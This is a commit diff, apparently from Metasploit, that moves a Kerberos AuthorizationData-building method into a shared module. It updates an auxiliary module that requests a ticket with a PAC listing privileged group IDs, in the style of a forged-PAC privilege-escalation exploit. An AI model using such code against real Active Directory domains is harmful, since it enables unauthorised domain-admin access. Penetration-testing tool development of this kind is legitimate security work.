Build AuthorizationData from the module
parent
9bd454d288
commit
e6781fcbea
|
@ -69,6 +69,20 @@ module Msf
|
|||
|
||||
pac_type
|
||||
end
|
||||
|
||||
def build_authorization_data(opts)
|
||||
pac = opts[:pac] || ''
|
||||
|
||||
pac_auth_data = Rex::Proto::Kerberos::Model::AuthorizationData.new(
|
||||
elements: [{:type => Rex::Proto::Kerberos::Pac::AD_WIN2K_PAC, :data => pac}]
|
||||
)
|
||||
authorization_data = Rex::Proto::Kerberos::Model::AuthorizationData.new(
|
||||
elements: [{:type => Rex::Proto::Kerberos::Model::AD_IF_RELEVANT, :data => pac_auth_data.encode}]
|
||||
)
|
||||
|
||||
authorization_data
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -16,14 +16,6 @@ module Msf
|
|||
realm = opts[:realm] || ''
|
||||
sname = opts[:sname] || build_server_name(opts)
|
||||
|
||||
#pac = build_pac(opts)
|
||||
|
||||
#opts.merge!({:pac => pac.encode})
|
||||
|
||||
auth_data = build_authorization_data(opts)
|
||||
|
||||
opts.merge!({:auth_data => auth_data})
|
||||
|
||||
subkey = Rex::Proto::Kerberos::Model::EncryptionKey.new(
|
||||
type: 23,
|
||||
#value: Rex::Text.rand_text(16)
|
||||
|
@ -32,7 +24,9 @@ module Msf
|
|||
|
||||
opts.merge!({:subkey => subkey})
|
||||
|
||||
if opts[:auth_data]
|
||||
enc_auth_data = build_enc_auth_data(opts)
|
||||
end
|
||||
|
||||
body = Rex::Proto::Kerberos::Model::KdcRequestBody.new(
|
||||
options: options,
|
||||
|
@ -87,19 +81,6 @@ module Msf
|
|||
e_data
|
||||
end
|
||||
|
||||
def build_authorization_data(opts)
|
||||
pac = opts[:pac] || ''
|
||||
|
||||
pac_auth_data = Rex::Proto::Kerberos::Model::AuthorizationData.new(
|
||||
elements: [{:type => Rex::Proto::Kerberos::Pac::AD_WIN2K_PAC, :data => pac}]
|
||||
)
|
||||
authorization_data = Rex::Proto::Kerberos::Model::AuthorizationData.new(
|
||||
elements: [{:type => Rex::Proto::Kerberos::Model::AD_IF_RELEVANT, :data => pac_auth_data.encode}]
|
||||
)
|
||||
|
||||
authorization_data
|
||||
end
|
||||
|
||||
# Builds a kerberos pre authenticated information structure for an TGS request
|
||||
#
|
||||
# @param opts [Hash]
|
||||
|
|
|
@ -72,6 +72,8 @@ class Metasploit4 < Msf::Auxiliary
|
|||
logon_time: logon_time,
|
||||
)
|
||||
|
||||
auth_data = build_authorization_data(pac: pac.encode)
|
||||
|
||||
res = send_request_tgs(
|
||||
client_name: 'juan',
|
||||
server_name: 'krbtgt/DEMO.LOCAL',
|
||||
|
@ -82,7 +84,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
ticket: ticket,
|
||||
group_ids: [513, 512, 520, 518, 519],
|
||||
domain_id: 'S-1-5-21-1755879683-3641577184-3486455962',
|
||||
pac: pac.encode
|
||||
auth_data: auth_data
|
||||
)
|
||||
|
||||
unless res.msg_type == 13
|
||||
|
|
Loading…
Reference in New Issue